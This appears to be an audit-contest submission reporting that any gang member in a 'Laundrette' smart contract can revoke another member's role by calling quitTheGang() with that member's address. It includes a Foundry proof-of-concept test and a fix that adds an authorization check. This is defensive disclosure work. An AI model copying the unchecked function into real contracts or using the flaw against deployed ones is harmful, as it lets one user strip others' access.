Submission Details
Severity:
AnyGangMember can let other GangMember quit the Gang without the consent of others.
Summary
AnyGangMember can let other GangMember quit the Gang without the consent of others.
Vulnerability Details
AnyGangMember can let other GangMember quit the Gang without the consent of others.
That say there are two gangmembers, alice and bob. Alice can let bob quit the gang without the consent of bob, here is the POC
address alice = makeAddr("alice");
address bob = makeAddr("bob");
function test_quitGang() public {
vm.prank(kernel.admin());
kernel.grantRole(Role.wrap("gangmember"), godFather);
vm.prank(godFather);
laundrette.addToTheGang(alice);
vm.prank(godFather);
laundrette.addToTheGang(bob);
assertEq(kernel.hasRole(address(alice), Role.wrap("gangmember")), true);
assertEq(kernel.hasRole(address(bob), Role.wrap("gangmember")), true);
vm.prank(alice);
laundrette.quitTheGang(address(bob));
assertEq(kernel.hasRole(address(bob), Role.wrap("gangmember")), false);
}
Impact
The Malicious GangMember can let everyone quit the Gang.
Tools Used
Manual Review, Foundry
Recommendations
the quitTheGang() should check account == msg.sender
- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
Updates
Lead Judging Commences
n0kto about 1 year ago
Submission Judgement Published Assigned finding tags:
Gang members ban other members
Rewards breakdown
nSLOC
205This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.